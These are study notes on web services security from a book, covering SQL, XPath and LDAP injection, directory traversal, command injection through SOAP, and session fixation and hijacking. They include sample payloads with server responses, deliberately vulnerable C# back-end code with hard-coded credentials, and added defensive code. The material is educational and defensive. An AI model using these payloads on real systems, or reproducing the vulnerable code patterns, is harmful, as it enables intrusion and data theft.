Web 2.0 Security-Defending Ajax,RIA,and SOA (study notes, .docx)

Chapter 11 SOA and Web Services Security

SOA basic architecture
SOA threat framework

Chapter 12 SOA Attack Vectors and Scanning for Vulnerabilities

Profiling Web services
Profiling Web services with wsScanner:

TECHNOLOGY FINGERPRINTING AND ENUMERATION (profiling the back-end architecture)
The back-end technology stack can be inferred from the ASMX and JWS extensions (file suffixes) and from information in the responses.

XML POISONING WITH SAX PARSING
XML POISONING WITH DOM

PARAMETER TAMPERING
- Metacharacter injection
- Data type mismatch
- Large buffer
- Abnormal values
- Sequence breaking

TAMPERING WITH DATA TYPES OF THE SOAP MESSAGE
Supplying data of a type other than the one the method expects may cause exception details to be returned.
"More information leaks mean more pieces of this Web services jigsaw puzzle that fit. As this set of information is collected and put into perspective, we may be able to draw a better picture about the technology and application layer logic in use and other significant information."

SQL INJECTION WITH SOAP MANIPULATION
Input a double quote: "
Response:
```text
soap:Server Server was unable to process request. --> Cannot use empty object or column names. Use a single space if necessary. Unclosed quotation mark before the character string ''. Line 1: Incorrect syntax near ''.
```
SQL injection attack: 1 OR 1=1
Response:
```text
/(1)Finding Nemo($14.99)/ /(2)Bend it like Beckham($12.99)/ /(3)Doctor Zhivago($10.99)/ /(4)A Bug's Life($13.99)/ /(5)Lagaan($12.99)/ /(6)Monsoon Wedding($10.99)/ /(7)Lawrence of Arabia($14.99)/
```

XPATH INJECTION
Normal request (username, password): shreeraj shreeraj
Response: 0009879001
Wrong credentials: shreeraj blahblah
Response: Access Denied!
XPath injection: ' or 1=1 or ''=' *
Response: 0009879001

Back-end code:
```csharp
using System.Xml;
using Microsoft.Data.SqlXml;

public string getSecurityToken(string username, string password)
{
    string xmlOut = "";
    // Hard-coded sa credential, exactly as it appears in the notes.
    string coString = "Provider=SQLOLEDB;Server=(local);database=order; User ID=sa;Password=JUNK6509to";
    SqlXmlCommand co = new SqlXmlCommand(coString);
    co.RootTag = "Credential";
    co.CommandType = SqlXmlCommandType.Sql;
    // The whole users table is pulled into an XML document...
    co.CommandText = "SELECT * FROM users for xml Auto";
    XmlReader xr = co.ExecuteXmlReader();
    xr.MoveToContent();
    xmlOut = xr.ReadOuterXml();
    XmlDocument doc = new XmlDocument();
    doc.LoadXml(xmlOut);
    // ...and username/password are concatenated straight into the XPath predicate.
    string credential = "//users[@username='" + username + "' and @password='" + password + "']";
    XmlNodeList xmln = doc.SelectNodes(credential);
    if (xmln.Count > 0)
    {
        // Token generation code
        return token;
    }
    else
    {
        return "Access Denied!";
    }
}
```

Vulnerability analysis:
```csharp
co.CommandText = "SELECT * FROM users for xml Auto";
string credential = "//users[@username='" + username + "' and @password='" + password + "']";
```
After injection the predicate becomes:
```text
//users[@username='' or 1=1 or ''='' and @password='anything']
```

LDAP INJECTION WITH SOAP
Normal access: shreeraj
Response:
```text
-----------------------
[displayname]Shreeraj K. Shah
[useraccountcontrol]66048
[initials]K
[objectguid]System.Byte[]
[whenchanged]1/5/2006 11:03:06 PM
[usncreated]5772
[name]Shreeraj K. Shah
[distinguishedname]CN=Shreeraj K. Shah,CN=Users,DC=bluesquare,DC=com
[primarygroupid]513
[lastlogon]0
[lastlogoff]0
[instancetype]4
[samaccountname]shreeraj
[countrycode]0
[badpasswordtime]0
[accountexpires]9223372036854775807
[adspath]LDAP://192.168.7.150/CN=Shreeraj K. Shah,CN=Users,DC=bluesquare,DC=com
… …
[objectclass]organizationalPerson
[objectclass]user
-----------------------
```
Inject a "(" character: (
Response:
```text
soap:Server Server was unable to process request. --> The (samaccountname=() search filter is invalid.
```
Back-end code:
```csharp
using System.DirectoryServices;

public string getUserInfo(string username)
{
    AuthenticationTypes at = AuthenticationTypes.Secure;
    // Binds to the directory with a hard-coded administrator credential, as in the notes.
    DirectoryEntry entry = new DirectoryEntry("LDAP://192.168.7.150", "administrator", "bla74", at);
    string domain = entry.Name.ToString();
    DirectorySearcher mySearcher = new DirectorySearcher(entry);
    SearchResultCollection results;
    // The caller-supplied username is concatenated straight into the LDAP search filter.
    string filter = "(samaccountname=" + username + ")";
    mySearcher.Filter = filter;
    results = mySearcher.FindAll();
    if (results.Count > 0)
    {
        //result block…
        return res;
    }
    else
    {
        return "none";
    }
}
```

Response to injecting a "*":
```text
-----------------------
[systemflags]-1946157056
[showinadvancedviewonly]False
[usncreated]1517
[samaccounttype]536870912
[distinguishedname]CN=Account Operators,CN=Builtin,DC=bluesquare,DC=com
[iscriticalsystemobject]True
[name]Account Operators
[instancetype]4
[samaccountname]Account Operators
[objectclass]top
[objectclass]group
[usnchanged]1519
[whenchanged]3/22/2004 3:32:31 AM
[adspath]LDAP://192.168.7.150/CN=Account Operators,CN=Builtin,DC=bluesquare,DC=com
[whencreated]3/22/2004 3:32:31 AM
[objectcategory]CN=Group,CN=Schema,CN=Configuration, DC=bluesquare,DC=com
[description]Members can administer domain user and group accounts
[grouptype]-2147483643
[cn]Account Operators
[objectsid]System.Byte[]
[objectguid]System.Byte[]
…………
--- and so on. All nodes are harvested ---
```

DIRECTORY TRAVERSAL AND FILESYSTEM ACCESS THROUGH SOAP
Normal date input: 20060109
Response:
```text
Ljubicic proves too good for MoyaAll emotions crossed his face. Anger, disappointment, annoyance. But Ivan Ljubicic didn't afford himself a smile till he smacked a forehand crosscourt winner. Chennai Open: Home hopes dashed when Rohan Bopanna struck the ball so hard that once he took off his own name plate from the scoreboard. The other time, he nearly decapitated Petr Pala. Atwal heroics not enough for Asia. Arjun Atwal led the fightback for Asia who however fell just short as Europe won the inaugural Royal Trophy by a 9-7 margin here on Sunday.
```
Input of the wrong data type: junk
Response (the error message discloses the server-side path):
```text
HTTP/1.1 500 Internal Server Error.
Server: Microsoft-IIS/5.0
Date: Mon, 09 Jan 2006 09:14:57 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/xml; charset=utf-8
Content-Length: 504

soap:Server Server was unable to process request. --> Could not find file &quot;c:\inetpub\wwwroot\news\junk&quot;.
```
Requesting the source file itself: daily.asmx
Response:
```text
<%@ WebService Language="c#" Class="daily" %>using System;using System.Web.Services;using System.Data.SqlClient;using System.IO;public class daily{[WebMethod] public string getSportsNews(string date){ ----- Source code of the entire file ------
```
Directory traversal: ../../../../../autoexec.bat

Vulnerable back-end code:
```csharp
using System.IO;

public string getSportsNews(string date)
{
    // The caller-supplied "date" is appended to a fixed directory with no validation.
    String prodfile = "c:\\inetpub\\wwwroot\\news\\" + date;
    FileStream fs = new FileStream(prodfile, FileMode.Open, FileAccess.Read);
    StreamReader sr = new StreamReader(fs);
    String file = "";
    while (sr.Peek() > -1)
    {
        file += sr.ReadLine();
    }
    return file;
}
```

OPERATING SYSTEM COMMAND EXECUTION USING VULNERABLE WEB SERVICES
Normal input: john
Response:
```text
Name=John City=NewYork State=NewYork Country=USA Weather=YES Stocks=No Email=YES
```
Wrong username input: junk
Response: Unsuccessful command
Command injection: john | dir c:\
Response:
```text
Volume in drive C has no label.
Volume Serial Number is 64F0-BF7D
Directory of c:\
04/08/2005 12:08p <DIR> .cpan
02/23/2004 12:57p 632 266973.7.slf.zip
11/15/2005 04:01p 55 addroute.bat
... ... ...
28 File(s) 1,511,669 bytes
17 Dir(s) 3,505,385,472 bytes free
```

Vulnerable back-end code:
```csharp
using System;

public string getUserPrefFile(string user)
{
    DateTime random = DateTime.Now;
    string store = random.ToUniversalTime().Ticks.ToString();
    System.Diagnostics.ProcessStartInfo psi = new System.Diagnostics.ProcessStartInfo();
    psi.FileName = @"C:\winnt\system32\cmd.exe";
    // The user name is spliced into a cmd.exe command line, so shell metacharacters such as "|" are interpreted.
    psi.Arguments = @"/c type c:\users\" + user + @" > c:\temp\" + store;
    psi.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
    System.Diagnostics.Process.Start(psi);
    System.Threading.Thread.Sleep(1000);
    System.IO.StreamReader sr = new System.IO.StreamReader(@"c:\temp\" + store);
    string file = sr.ReadToEnd();
    if (file.Length > 0)
        return file;
    else
        return "Unsuccessful command";
}
```

SOAP MESSAGE BRUTE FORCING
SOAP brute forcing is no different from any other type of brute forcing used at different levels of services such as FTP and Network Basic Input/Output System (NetBIOS). Authentication is required before consuming Web services. Successful authentication results in the user getting a security token or parameter to access other parts of Web services. This type of authentication may be done using a username and password combination. In the absence of lockout policies or proper logging mechanisms, it is possible to launch brute forcing attacks on these parameters and try to gain unauthorized access to the system and Web services.

SESSION HIJACKING WITH WEB SERVICES
Request (username, password): shreeraj shreeraj
Response:
```text
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 10 Jan 2006 11:52:43 GMT
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: ASP.NET_SessionId=xuuhba32c552ic2kk4vorrfo; path=/
Cache-Control: private, max-age=0
Content-Type: text/xml; charset=utf-8
Content-Length: 384

xuuhba32c552ic2kk4vorrfo
```
If the cookie is constructed using a weak algorithm, it can be vulnerable to easy guesses by another user. This may lead to session hijacking. Another potential hazard is unencrypted HTTP traffic sniffed over the network and replayed.
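For the XPath injection case above: an added example, not code from the notes or the book, that renders each user value as an XPath string literal before it is concatenated, so the apostrophe in `' or 1=1 or ''='` can no longer close the literal and extend the predicate. The `XPathLogin` class, the `Check` method and the constructed `<Credential>` document are assumptions standing in for the real users table.

```csharp
using System;
using System.Text;
using System.Xml;

public static class XPathLogin
{
    // Turn a user-supplied value into an XPath string literal. A value with no
    // apostrophe is single-quoted, one with no double quote is double-quoted, and a
    // value containing both is rebuilt with concat() so neither quote can break out.
    public static string Literal(string value)
    {
        if (value.IndexOf('\'') < 0) return "'" + value + "'";
        if (value.IndexOf('"') < 0) return "\"" + value + "\"";
        var sb = new StringBuilder("concat(");
        string[] parts = value.Split('\'');
        for (int i = 0; i < parts.Length; i++)
        {
            if (i > 0) sb.Append(", \"'\", ");
            sb.Append('\'').Append(parts[i]).Append('\'');
        }
        return sb.Append(')').ToString();
    }

    // Same lookup as getSecurityToken, but the predicate is built from literals.
    public static bool Check(XmlDocument doc, string username, string password)
    {
        string credential = "//users[@username=" + Literal(username)
                          + " and @password=" + Literal(password) + "]";
        return doc.SelectNodes(credential).Count > 0;
    }

    public static void Main()
    {
        // Constructed stand-in for the "SELECT * FROM users for xml Auto" output.
        var doc = new XmlDocument();
        doc.LoadXml("<Credential><users username=\"shreeraj\" password=\"shreeraj\"/></Credential>");
        Console.WriteLine(Check(doc, "shreeraj", "shreeraj"));           // True
        Console.WriteLine(Check(doc, "' or 1=1 or ''='", "anything"));  // False: compared as a plain string
        Console.WriteLine(Literal("a'b\"c"));                            // concat('a', "'", 'b"c')
    }
}
```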
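For the LDAP injection case above: an added example, not code from the notes, showing how the `(samaccountname=...)` filter of `getUserInfo` can be built so that "(" and "*" from the caller are matched literally instead of changing the filter. The `LdapFilter` class, the account-name pattern and the 20-character limit are assumptions; the escaping follows the RFC 4515 filter syntax.

```csharp
using System;
using System.Text;
using System.Text.RegularExpressions;

public static class LdapFilter
{
    // Escape the characters RFC 4515 gives special meaning inside a filter
    // assertion value, so "(", ")", "*", "\" and NUL are matched literally.
    public static string EscapeValue(string value)
    {
        var sb = new StringBuilder(value.Length);
        foreach (char c in value)
        {
            switch (c)
            {
                case '\\': sb.Append(@"\5c"); break;
                case '*':  sb.Append(@"\2a"); break;
                case '(':  sb.Append(@"\28"); break;
                case ')':  sb.Append(@"\29"); break;
                case '\0': sb.Append(@"\00"); break;
                default:   sb.Append(c);      break;
            }
        }
        return sb.ToString();
    }

    // Builds the filter getUserInfo used. The allow-list already rejects filter
    // metacharacters; escaping what is left is defence in depth for the lookup.
    public static string BuildFilter(string username)
    {
        if (string.IsNullOrEmpty(username) || username.Length > 20
            || !Regex.IsMatch(username, @"^[A-Za-z0-9._-]+$"))
            throw new ArgumentException("rejected account name");
        return "(samaccountname=" + EscapeValue(username) + ")";
    }

    public static void Main()
    {
        Console.WriteLine(BuildFilter("shreeraj"));   // (samaccountname=shreeraj)
        Console.WriteLine(EscapeValue("*"));          // \2a  (a literal asterisk, not a wildcard)
        Console.WriteLine(EscapeValue("("));          // \28
        try { BuildFilter("*"); }
        catch (ArgumentException e) { Console.WriteLine(e.Message); } // rejected account name
    }
}
```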
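Both `getSportsNews` and `getUserPrefFile` above splice a caller-supplied name into a file path, and the second one also into a cmd.exe command line. The added example below is not code from the notes; it shows one way to serve such files safely: an allow-list on the name, a canonical-path check that the result stays under the base directory, a direct `File.ReadAllText` instead of a shell, and a fixed error string in place of the exception text that leaked `c:\inetpub\wwwroot\news\` in the HTTP 500 above. The `SafeFileService` class and its method names are assumptions; the directories are the ones named in the notes.

```csharp
using System;
using System.IO;
using System.Text.RegularExpressions;

public static class SafeFileService
{
    // Resolve "name" under baseDir and refuse anything that could leave it.
    public static string ResolveUnder(string baseDir, string name)
    {
        // Allow-list: the services above expect a yyyymmdd date or a short account
        // name, so slashes, dots, pipes and spaces are never legitimate input.
        if (name == null || !Regex.IsMatch(name, @"^[A-Za-z0-9_]{1,32}$"))
            throw new ArgumentException("invalid name");

        // Canonicalise and check containment anyway (defence in depth).
        string root = Path.GetFullPath(baseDir);
        if (!root.EndsWith(Path.DirectorySeparatorChar.ToString()))
            root += Path.DirectorySeparatorChar;
        string full = Path.GetFullPath(Path.Combine(root, name));
        if (!full.StartsWith(root, StringComparison.OrdinalIgnoreCase))
            throw new UnauthorizedAccessException("path escapes base directory");
        return full;
    }

    // Replacement for getSportsNews / getUserPrefFile: no cmd.exe, no temp file,
    // and the caller only ever sees the file content or a fixed message.
    public static string ReadOrDefault(string baseDir, string name, string fallback)
    {
        try
        {
            return File.ReadAllText(ResolveUnder(baseDir, name));
        }
        catch (Exception ex) when (ex is ArgumentException || ex is UnauthorizedAccessException || ex is IOException)
        {
            // Log ex on the server; never echo it, or the path leaks as in the HTTP 500 above.
            return fallback;
        }
    }

    public static void Main()
    {
        string news = @"c:\inetpub\wwwroot\news";
        Console.WriteLine(ReadOrDefault(news, "20060109", "no news"));
        Console.WriteLine(ReadOrDefault(news, @"..\..\..\..\..\autoexec.bat", "no news"));   // no news
        Console.WriteLine(ReadOrDefault(@"c:\users", @"john | dir c:\", "Unsuccessful command")); // Unsuccessful command
    }
}
```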
Session Fixation

Session Fixation translates as a "session fixing attack". It was fairly common in older applications, but as web applications have become more complex this problem has become rare.

To understand the attack, an analogy:
1. You pay for a car.
2. You make a copy of the car key.
3. You sell the car to a sucker.
4. The sucker has paid for a second-hand car, and one day while he is away you drive it off with the key you copied in advance!

This process is a Session Fixation, and the car key is the session ID.

The essence of this class of problem: the web application does not rewrite or refresh the session after authentication, so the session from before authentication remains usable.

If the attacker knows the session ID in advance, he can trick the user into authenticating with that session ID. After authentication the session ID is unchanged, but the session has become an authenticated session, so the attacker can use that session ID directly to pass the system's authentication as the user.

In a web environment, the server creates a session when the user browses a page, and the session ID is then kept on the client side, for example in the browser URL or in a cookie. As long as the user holds this session ID, the server can find his session. After the user enters a username and password, the system authenticates that session. On success the session becomes an authenticated session; the server knows the user has authenticated, and the user no longer needs to enter a username and password each time he visits an authenticated page.

A common way to exploit Session Fixation is to send a link in an email and trick the user into clicking it and logging in, so that the session becomes authenticated, for example:
  http://www.fvck.com/auth?session=xxxxxxx

Defending against this attack is simple: regenerate the session after authentication; even modifying the current session achieves the purpose.

Session Hijacking

HTTP is a stateless connection; session state can only be maintained through the server-side SESSION. SESSION authentication depends on a unique ID issued to the user. The user's browser sends an ID to the server; if that session ID exists on the server side, the user is considered the same person as the session's user. A malicious attacker can sniff COOKIE information on the network and use another user's SESSION ID, thereby impersonating the legitimate user. This is SESSION hijacking.

Besides holding the session ID, COOKIEs are often used for the "remember password" feature to avoid tedious logins. Most websites store the account and password in the COOKIE, which increases the risk: the COOKIE can be spied on by a third party in transit, the COOKIE file can be maliciously copied, the COOKIE can be constructed offline to crack the password... all of this falls under COOKIE spoofing.

The existing remedy is to use SSL for secure transport, but that adds overhead; most websites cannot afford the huge resource cost of site-wide SSL, so often only the login page uses SSL while other pages remain plain HTTP. This is of no use against SESSION hijacking.

Use the IP address, MAC address, etc. to uniquely identify the source of a request.

References:
http://blog.csdn.net/huangkaixuan/article/details/7614547
http://msdn.microsoft.com/zh-cn/magazine/cc300500(en-us).aspx
http://hi.baidu.com/yangyuenfei/item/c516c234f6544c483075a1f7

Chapter 13 Web 2.0 Application Fuzzing for Vulnerability Detection and Filtering for Countermeasures

WEB 2.0 APPLICATION FUZZING
FUZZING XML STREAMS
One can analyze these responses and identify possible vulnerabilities. For example, in the above case, we get a string saying "Error in running statement" that is clearly pointing to some sort of SQL statement issue. One can investigate the issue in detail.
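For the Session Fixation and Session Hijacking sections above: an added example, not code from the notes, of a minimal server-side session table that issues unguessable IDs from the OS CSPRNG (against the weak-cookie guessing noted under session hijacking) and swaps the ID at the moment of authentication, so an ID planted before login never becomes the authenticated one. The `SessionStore` class and its method names are assumptions, and carrying the ID in a cookie is left to the caller.

```csharp
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

public class SessionStore
{
    // session id -> authenticated user name (null while the session is anonymous)
    private readonly Dictionary<string, string> sessions = new Dictionary<string, string>();

    // Called on first visit: an anonymous session with a fresh random id.
    public string Create()
    {
        string id = NewId();
        sessions[id] = null;
        return id;
    }

    // Called only after the password check succeeded. The pre-login id is retired and
    // a new one issued ("regenerate the session after authentication"), so whoever
    // planted the old id is left holding a dead session.
    public string Authenticate(string preLoginId, string user)
    {
        if (!sessions.Remove(preLoginId))
            throw new InvalidOperationException("unknown session");
        string id = NewId();
        sessions[id] = user;
        return id;
    }

    // Returns the user bound to id, or null if the id is unknown or still anonymous.
    public string UserFor(string id)
    {
        return sessions.TryGetValue(id, out string user) ? user : null;
    }

    // 128 random bits from the platform CSPRNG, hex encoded: not derived from time,
    // counters or the user name, so it cannot be guessed like a weakly built cookie.
    private static string NewId()
    {
        byte[] bytes = new byte[16];
        using (var rng = RandomNumberGenerator.Create())
            rng.GetBytes(bytes);
        return BitConverter.ToString(bytes).Replace("-", "").ToLowerInvariant();
    }

    public static void Main()
    {
        var store = new SessionStore();
        string planted = store.Create();                   // id an attacker could have fixed on the victim
        string loggedIn = store.Authenticate(planted, "shreeraj");
        Console.WriteLine(store.UserFor(planted) == null); // True: the planted id no longer exists
        Console.WriteLine(store.UserFor(loggedIn));        // shreeraj
    }
}
```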
FUZZING JSON STREAMS
Having access to the JSON stream, one can do full-blown penetration and application assessment testing on it. It is possible to do, for example, SQL injections, LDAP/XPATH injections, user/pass brute forcing on these JSON streams. The application resource may fail and cough up some critical information back to the attacker and can open a security hole.

WEB 2.0 APPLICATION FIREWALL AND FILTERING
Defenses:
To overcome this critical problem, there are two possible solutions:
1. Applying powerful Web 2.0 content filtering capability such as implementing an XML firewall or JSON filtering to protect these streams
2. Secure coding and proper input validation before receiving input from these Web 2.0 streams

WEB 2.0 FIREWALL AND FILTERING WITH MODSECURITY
http://www.modsecurity.org/

WEB 2.0 FIREWALL WITH IHTTPMODULE IN .NET
Microsoft's .NET framework includes two interfaces: IHttpModule and IHttpHandler. These two interfaces can be leveraged to provide application-level defenses customized to application level, folder level, or variable level. This can act as the first line of defense, before any incoming request touches the Web application source code level. This is Web application defense at the gates, for the .NET framework on IIS.

Chapter 14 Web 2.0 Application Defenses by Request Signature and Code Scanning
